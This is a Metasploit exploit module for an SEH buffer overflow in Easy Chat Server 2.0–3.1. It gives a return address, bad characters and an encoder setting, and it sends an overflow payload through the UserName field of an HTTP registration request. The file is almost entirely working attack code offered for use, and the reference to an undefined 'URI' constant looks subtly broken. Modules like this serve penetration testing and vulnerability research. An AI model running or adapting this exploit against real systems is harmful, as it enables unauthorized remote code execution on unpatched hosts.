## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)', 'Description' => %q{ This module exploits a buffer overflow during user registration in Easy Chat Server software. }, 'Author' => [ 'Marco Rivoli', #Metasploit 'Aitezaz Mohsin' #POC ], 'License' => MSF_LICENSE, 'References' => [ [ 'EDB', '42155' ], ], 'Privileged' => true, 'Payload' => { 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", }, 'Platform' => 'win', 'Targets' => [ [ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ], ], 'DefaultOptions' => { 'RPORT' => 80, 'EXITFUNC' => 'thread', 'ENCODER' => 'x86/alpha_mixed' }, 'DisclosureDate' => 'Oct 09 2017', 'DefaultTarget' => 0)) end def exploit sploit = rand_text_alpha_upper(217) sploit << "\xeb\x06\x90\x90" sploit << [target.ret].pack('V') sploit << payload.encoded sploit << rand_text_alpha_upper(200) res = send_request_cgi({ 'uri' => normalize_uri(URI,'registresult.htm'), 'method' => 'POST', 'vars_post' => { 'UserName' => sploit, 'Password' => 'test', 'Password1' => 'test', 'Sex' => 1, 'Email' => 'x@', 'Icon' => 'x.gif', 'Resume' => 'xxxx', 'cw' => 1, 'RoomID' => 4, 'RepUserName' => 'admin', 'submit1' => 'Register' } }) handler end end